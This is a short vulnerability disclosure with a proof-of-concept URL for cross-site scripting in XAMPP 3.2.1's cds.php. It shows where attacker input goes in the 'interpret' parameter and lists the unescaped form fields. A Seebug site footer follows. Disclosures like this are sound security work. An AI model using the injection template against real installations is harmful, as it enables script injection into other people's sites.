#Title : XAMPP 3.2.1 Cross Site Scripting #Author : DevilScreaM #Date : 15 January 2014 #Category : Web Applications #Vendor : http://sourceforge.net/projects/xampp #Version : 3.2.1 #Type : PHP #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Tested : Mozila, Chrome, Opera -> Windows #Vulnerabillity : Cross Site Scripting Cross Site Scripting Exploit & POC http://localhost/xampp/cds.php?interpret=[YOUR_XSS]&titel=title&jahr=title Example http://localhost/xampp/cds.php?interpret=<h1>DevilScreaM</h1>&titel=title&jahr=title View Cross Site Scripting at http://localhost/xampp/cds-fpdf.php Vulnerabillity at Code <tr><td><?php print $TEXT['cds-attrib1']; ?>:</td><td><input type=text size=30 name=interpret></td></tr> <tr><td><?php print $TEXT['cds-attrib2']; ?>:</td><td> <input type=text size=30 name=titel></td></tr> <tr><td><?php print $TEXT['cds-attrib3']; ?>:</td><td> <input type=text size=5 name=jahr></td></tr>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论